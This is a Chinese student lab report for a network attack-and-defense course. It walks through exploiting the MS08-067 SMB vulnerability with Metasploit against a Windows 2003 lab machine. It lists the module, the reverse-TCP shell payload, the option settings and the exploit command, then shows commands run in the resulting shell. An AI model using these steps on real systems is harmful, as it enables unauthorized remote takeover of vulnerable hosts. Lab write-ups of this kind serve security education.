20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

20145335郝昊《网络攻防》Exp5 MS08_067漏洞测试

实验内容

  • 了解掌握metasploit平台的一些基本操作,能学会利用已知信息完成简单的渗透操作。

  • 漏洞MS08_067:攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC请求,通过MSRPC接口调用serve服务函数NetPathCanonicalize函数对进行远程访问的路径规范化,而此函数中存在栈缓冲区内存漏洞,可被利用实施远程代码执行.

  • 漏洞威胁:能远程主动发起对漏洞主机端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

  • 使用的主机:kali:192.168.199.129windows 2003 :192.168.199.223
    884698-20170412093257579-1609904592.png
    884698-20170412093309563-540795816.png

实验步骤

  • 使用命令msfconsole进入控制台,可以使用search ms08_067查看相关信息。

884698-20170412093106094-394944157.png

  • 得到相应模块名之后,我们使用该模块,使用 show payloads ,确定攻击载荷。

884698-20170412093120688-1762639996.png

  • 之后使用命令 use exploit/windows/smb/ms08_067_netapi

  • set payload generic/shell_reverse_tcp选择playoad,并查看相关信息。

884698-20170412093132891-1790204197.png

  • 使用命令show options确定,之后按照显示出的信息进行修改,我们需要设置好监听ip,监听端口以及攻击Ip(这里需要利用RPC请求发起攻击,所以RPORT设置为445不需要修改)

884698-20170412093144547-1852468463.png

  • 我们可以通过修改target的值,来选择我们具体想要攻击的计算机系统(通常可以采用自动选取,即target设置为0)

884698-20170412093157547-862669694.png

  • 使用命令exploit发起攻击,实验结果如下图

884698-20170412093209047-1800936026.png

  • 使用ipconfig命令查看

884698-20170412093219407-103989228.png

  • 创建文件夹

884698-20170412093231922-1943525095.png
884698-20170412093242594-1960499358.png

转载于:https://www.cnblogs.com/20145335hh/p/6697635.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值